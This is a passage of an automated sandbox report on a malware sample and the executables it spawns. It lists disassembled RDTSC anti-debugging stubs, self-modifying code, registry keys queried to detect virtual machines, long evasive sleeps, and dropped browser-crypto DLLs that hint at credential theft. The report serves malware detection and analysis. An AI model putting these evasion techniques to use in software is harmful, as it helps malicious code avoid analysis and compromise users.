Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90875 second address: 4A9087B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A9087B second address: 4A9088C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738E98EEDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30213 second address: 4A30219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 247239 second address: 24723E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90C4D second address: 4A90CAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 jmp 00007F2738B89E13h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov bx, ax 0x00000012 mov di, cx 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007F2738B89E0Ah 0x0000001d push dword ptr [ebp+0Ch] 0x00000020 jmp 00007F2738B89E10h 0x00000025 push dword ptr [ebp+08h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F2738B89E17h 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90CAC second address: 4A90CF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 8B600F41h 0x0000000e jmp 00007F2738E98EF7h 0x00000013 add dword ptr [esp], 74A0F0C1h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov al, dh 0x0000001f mov ax, 3B23h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 246372 second address: 246381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F2738B89E06h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 24651F second address: 246523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 246523 second address: 246547 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2738B89E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007F2738B89E17h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 246AA2 second address: 246AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 246AA6 second address: 246AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249937 second address: 24993B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 24993B second address: 24997B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 mov ecx, dword ptr [ebp+122D29C8h] 0x0000000f call 00007F2738B89E09h 0x00000014 jno 00007F2738B89E14h 0x0000001a push eax 0x0000001b jc 00007F2738B89E0Ah 0x00000021 push eax 0x00000022 pushad 0x00000023 popad 0x00000024 pop eax 0x00000025 mov eax, dword ptr [esp+04h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 24997B second address: 249980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249980 second address: 249A3B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007F2738B89E06h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edx 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 jmp 00007F2738B89E17h 0x0000001e je 00007F2738B89E0Ch 0x00000024 jg 00007F2738B89E06h 0x0000002a popad 0x0000002b pop eax 0x0000002c jbe 00007F2738B89E0Bh 0x00000032 mov esi, 0F8E5FECh 0x00000037 sub edx, dword ptr [ebp+122D2800h] 0x0000003d push 00000003h 0x0000003f add cx, C498h 0x00000044 push 00000000h 0x00000046 call 00007F2738B89E0Ah 0x0000004b mov ecx, 55B2C87Ch 0x00000050 pop edi 0x00000051 push 00000003h 0x00000053 push 00000000h 0x00000055 push ebx 0x00000056 call 00007F2738B89E08h 0x0000005b pop ebx 0x0000005c mov dword ptr [esp+04h], ebx 0x00000060 add dword ptr [esp+04h], 00000015h 0x00000068 inc ebx 0x00000069 push ebx 0x0000006a ret 0x0000006b pop ebx 0x0000006c ret 0x0000006d jmp 00007F2738B89E14h 0x00000072 cld 0x00000073 push 4A5E3EBFh 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007F2738B89E18h 0x0000007f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249A3B second address: 249A40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249A40 second address: 249A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E0Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 75A1C141h 0x00000013 mov esi, 3BED1B79h 0x00000018 lea ebx, dword ptr [ebp+1244E7D7h] 0x0000001e mov dword ptr [ebp+122D1831h], eax 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push ebx 0x00000028 pushad 0x00000029 popad 0x0000002a pop ebx 0x0000002b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249A74 second address: 249A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249A7A second address: 249A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249A7E second address: 249A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249AEB second address: 249B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F2738B89E0Fh 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push edx 0x00000015 push esi 0x00000016 jmp 00007F2738B89E0Ch 0x0000001b pop esi 0x0000001c pop edx 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 pushad 0x00000021 jns 00007F2738B89E06h 0x00000027 jmp 00007F2738B89E0Ah 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249B32 second address: 249B47 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2738E98EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249B47 second address: 249B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249B4D second address: 249C04 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2738E98EE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F2738E98EE8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 call 00007F2738E98EEAh 0x0000002c mov dword ptr [ebp+122D194Bh], edx 0x00000032 pop edx 0x00000033 push 00000003h 0x00000035 mov di, CACCh 0x00000039 or di, 5384h 0x0000003e push 00000000h 0x00000040 sub ecx, dword ptr [ebp+122D189Dh] 0x00000046 push 00000003h 0x00000048 mov edi, 0DB0C5EBh 0x0000004d push 9DCD71B2h 0x00000052 jo 00007F2738E98F01h 0x00000058 jng 00007F2738E98EFBh 0x0000005e xor dword ptr [esp], 5DCD71B2h 0x00000065 movzx ecx, cx 0x00000068 jmp 00007F2738E98EEEh 0x0000006d lea ebx, dword ptr [ebp+1244E7E0h] 0x00000073 mov dword ptr [ebp+122D37E1h], eax 0x00000079 xchg eax, ebx 0x0000007a push esi 0x0000007b jp 00007F2738E98EE8h 0x00000081 pop esi 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 pushad 0x00000088 popad 0x00000089 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249C04 second address: 249C14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249C70 second address: 249C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249C76 second address: 249C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b sub dword ptr [ebp+122D3802h], edx 0x00000011 push C1EE6B20h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249C93 second address: 249C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249C98 second address: 249C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249C9E second address: 249CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249CA2 second address: 249D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 3E119560h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F2738B89E08h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov edi, 3F64FA67h 0x0000002e sbb dh, FFFFFFB6h 0x00000031 push 00000003h 0x00000033 push 00000000h 0x00000035 call 00007F2738B89E0Bh 0x0000003a pop ecx 0x0000003b push 00000003h 0x0000003d mov si, BF1Dh 0x00000041 call 00007F2738B89E09h 0x00000046 jns 00007F2738B89E0Eh 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jl 00007F2738B89E08h 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249D11 second address: 249D16 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249D16 second address: 249D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ecx 0x0000000c jmp 00007F2738B89E0Bh 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [eax] 0x00000014 push ebx 0x00000015 jo 00007F2738B89E08h 0x0000001b push edi 0x0000001c pop edi 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 jmp 00007F2738B89E0Fh 0x00000027 pop eax 0x00000028 stc 0x00000029 lea ebx, dword ptr [ebp+1244E7EBh] 0x0000002f cmc 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 ja 00007F2738B89E08h 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90D33 second address: 4A90D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90D39 second address: 4A90D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90D3D second address: 4A90D57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2738E98EEFh 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 23CE75 second address: 23CE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2738B89E06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 2696AB second address: 2696C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 26981A second address: 269840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2738B89E06h 0x0000000a popad 0x0000000b jmp 00007F2738B89E0Bh 0x00000010 pop eax 0x00000011 pushad 0x00000012 push edx 0x00000013 jng 00007F2738B89E06h 0x00000019 pushad 0x0000001a popad 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 269840 second address: 269844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 269DD1 second address: 269DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 269DD5 second address: 269DE2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2738E98EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 269DE2 second address: 269E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E0Ah 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F2738B89E17h 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 jng 00007F2738B89E06h 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 269E1A second address: 269E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 269E20 second address: 269E36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F2738B89E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F2738B89E06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 269E36 second address: 269E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 269E3A second address: 269E3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 26A2BC second address: 26A2C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Special instruction interceptor: First address: 30E9B4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Special instruction interceptor: First address: 4BA51F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 88E9B4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: A3A51F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Special instruction interceptor: First address: 2FF605 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: E9F605 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Code function: 6_2_04A906A8 rdtsc 6_2_04A906A8
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1645 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1852 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1899 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1873 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1104
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1145
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1162
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1122
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1145
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1159
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1924 Thread sleep count: 60 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1924 Thread sleep time: -120060s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4952 Thread sleep count: 61 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4952 Thread sleep time: -122061s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5612 Thread sleep count: 1645 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5612 Thread sleep time: -3291645s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5196 Thread sleep count: 1852 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5196 Thread sleep time: -3705852s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4040 Thread sleep count: 70 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4040 Thread sleep time: -140070s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6944 Thread sleep count: 311 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6944 Thread sleep time: -9330000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7192 Thread sleep time: -1440000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3840 Thread sleep count: 1899 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3840 Thread sleep time: -3799899s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1088 Thread sleep count: 1873 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1088 Thread sleep time: -3747873s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7752 Thread sleep count: 1104 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7752 Thread sleep time: -2209104s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7756 Thread sleep count: 1145 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7756 Thread sleep time: -2291145s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760 Thread sleep count: 1162 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760 Thread sleep time: -2325162s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7720 Thread sleep count: 319 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7720 Thread sleep time: -9570000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7952 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7768 Thread sleep count: 1122 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7768 Thread sleep time: -2245122s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7764 Thread sleep count: 1145 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7764 Thread sleep time: -2291145s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7776 Thread sleep count: 1159 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7776 Thread sleep time: -2319159s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
